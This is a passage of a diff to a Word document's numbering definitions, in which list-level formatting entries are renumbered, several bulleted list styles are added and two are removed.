+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="285C104A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="4FC250A0"/>
@@ -3615,7 +9392,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="29333E41"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0242F820"/>
@@ -3728,7 +9505,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2D316927"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="98543B14"/>
@@ -3841,7 +9618,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3074180D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C820FCA0"/>
@@ -3954,7 +9731,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="32216402"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FD9A8E48"/>
@@ -4067,7 +9844,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="32D3070C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="1C0EC256"/>
@@ -4182,7 +9959,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="39426B65"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C6880690"/>
@@ -4295,96 +10072,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="3A504F12"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="CD1E779A"/>
-    <w:lvl w:ilvl="0" w:tplc="3AE6D278">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%1-"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="720" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%2."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1440" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="2160" w:hanging="180"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2880" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%5."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3600" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="4320" w:hanging="180"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5040" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%8."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5760" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="6480" w:hanging="180"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4336437E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="D7F6842E"/>
@@ -4470,7 +10158,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="46D105F3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EAB8546E"/>
@@ -4583,7 +10271,233 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4D934B65"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="5F3E5F24"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4E91466A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="354640D8"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7200" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="51AC005C"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="DEF2A054"/>
@@ -4732,7 +10646,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="548C522A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="A31ACA1E"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="569C6004"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8CE6DADE"/>
@@ -4845,123 +10872,10 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="580C1873"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="775A2FE2"/>
-    <w:lvl w:ilvl="0" w:tplc="04090001">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="720" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="o"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1440" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2160" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2880" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="o"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3600" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="4320" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5040" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="o"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5760" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="6480" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5A262659"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="AF9A4C66"/>
+    <w:tmpl w:val="B8D2DA14"/>
     <w:lvl w:ilvl="0" w:tplc="04090001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -5071,10 +10985,349 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="5F132F36"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="AFF62376"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
